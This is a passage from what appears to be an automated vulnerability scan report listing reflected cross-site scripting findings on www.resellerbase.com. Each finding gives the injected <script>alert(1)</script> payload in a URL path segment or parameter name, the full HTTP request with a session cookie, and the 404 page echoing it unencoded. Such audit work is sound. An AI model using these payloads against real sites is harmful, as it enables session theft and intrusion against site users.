Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8f24e<script>alert(1)</script>72d9c766973/41/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2934. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 62702<script>alert(1)</script>bea573ccee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4162702<script>alert(1)</script>bea573ccee/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4162702<script>alert(1)</script>bea573ccee/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2935. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79732<script>alert(1)</script>4693da2c4e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes79732<script>alert(1)</script>4693da2c4e3/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes79732<script>alert(1)</script>4693da2c4e3/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2936. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 907ed<script>alert(1)</script>7e6ee5f313e was submitted in REST URL parameter 4 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos907ed<script>alert(1)</script>7e6ee5f313e/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos907ed<script>alert(1)</script>7e6ee5f313e/images/ was not found on this server.</p>
...[SNIP]...

2.2937. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 16893<script>alert(1)</script>52e2d52d552 was submitted in REST URL parameter 5 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images16893<script>alert(1)</script>52e2d52d552/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images16893<script>alert(1)</script>52e2d52d552/ was not found on this server.</p>
...[SNIP]...

2.2938. http://www.resellerbase.com/detail/41/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 738c3<script>alert(1)</script>ffd0a9a8cbc was submitted as the name of an arbitrarily supplied query-string parameter and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the query string, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/?738c3<script>alert(1)</script>ffd0a9a8cbc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/?738c3<script>alert(1)</script>ffd0a9a8cbc=1 was not found on this server.</p>
...[SNIP]...

2.2939. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd410<script>alert(1)</script>e6f4db6687a was submitted in REST URL parameter 1 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbd410<script>alert(1)</script>e6f4db6687a/41/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbd410<script>alert(1)</script>e6f4db6687a/41/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2940. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99636<script>alert(1)</script>e9acf9c8c2f was submitted in REST URL parameter 2 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4199636<script>alert(1)</script>e9acf9c8c2f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4199636<script>alert(1)</script>e9acf9c8c2f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2941. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bde69<script>alert(1)</script>b76042b48a7 was submitted in REST URL parameter 3 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themesbde69<script>alert(1)</script>b76042b48a7/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themesbde69<script>alert(1)</script>b76042b48a7/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2942. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2fe01<script>alert(1)</script>5288426f9f6 was submitted in REST URL parameter 4 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos2fe01<script>alert(1)</script>5288426f9f6/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos2fe01<script>alert(1)</script>5288426f9f6/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2943. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 44ec0<script>alert(1)</script>91ee332c6d3 was submitted in REST URL parameter 5 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images44ec0<script>alert(1)</script>91ee332c6d3/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images44ec0<script>alert(1)</script>91ee332c6d3/rating/ was not found on this server.</p>
...[SNIP]...

2.2944. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9220a<script>alert(1)</script>4f7b8488c0c was submitted in REST URL parameter 6 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating9220a<script>alert(1)</script>4f7b8488c0c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating9220a<script>alert(1)</script>4f7b8488c0c/ was not found on this server.</p>
...[SNIP]...

2.2945. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b6b1c<script>alert(1)</script>8b164292b08 was submitted as the name of an arbitrarily supplied query-string parameter and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the query string, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating/?b6b1c<script>alert(1)</script>8b164292b08=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/?b6b1c<script>alert(1)</script>8b164292b08=1 was not found on this server.</p>
...[SNIP]...

2.2946. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78336<script>alert(1)</script>b8297b1aa97 was submitted in REST URL parameter 1 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail78336<script>alert(1)</script>b8297b1aa97/41/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail78336<script>alert(1)</script>b8297b1aa97/41/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2947. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 115f5<script>alert(1)</script>a257854f4e4 was submitted in REST URL parameter 2 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41115f5<script>alert(1)</script>a257854f4e4/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41115f5<script>alert(1)</script>a257854f4e4/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2948. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 874c9<script>alert(1)</script>088484ef7b was submitted in REST URL parameter 3 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes874c9<script>alert(1)</script>088484ef7b/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes874c9<script>alert(1)</script>088484ef7b/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2949. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34646<script>alert(1)</script>aa397767314 was submitted in REST URL parameter 4 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos34646<script>alert(1)</script>aa397767314/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos34646<script>alert(1)</script>aa397767314/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2950. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2f7bd<script>alert(1)</script>6f5026c4b06 was submitted in REST URL parameter 5 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images2f7bd<script>alert(1)</script>6f5026c4b06/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images2f7bd<script>alert(1)</script>6f5026c4b06/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2951. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 895d3<script>alert(1)</script>b099585717e was submitted in REST URL parameter 6 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating895d3<script>alert(1)</script>b099585717e/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating895d3<script>alert(1)</script>b099585717e/4half.gif was not found on this server.</p>
...[SNIP]...

2.2952. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c7817<script>alert(1)</script>a21fd07a007 was submitted in REST URL parameter 7 and was echoed unmodified in the application's response: the 404 error page reflects the full requested URL, including the injected path segment, without HTML encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

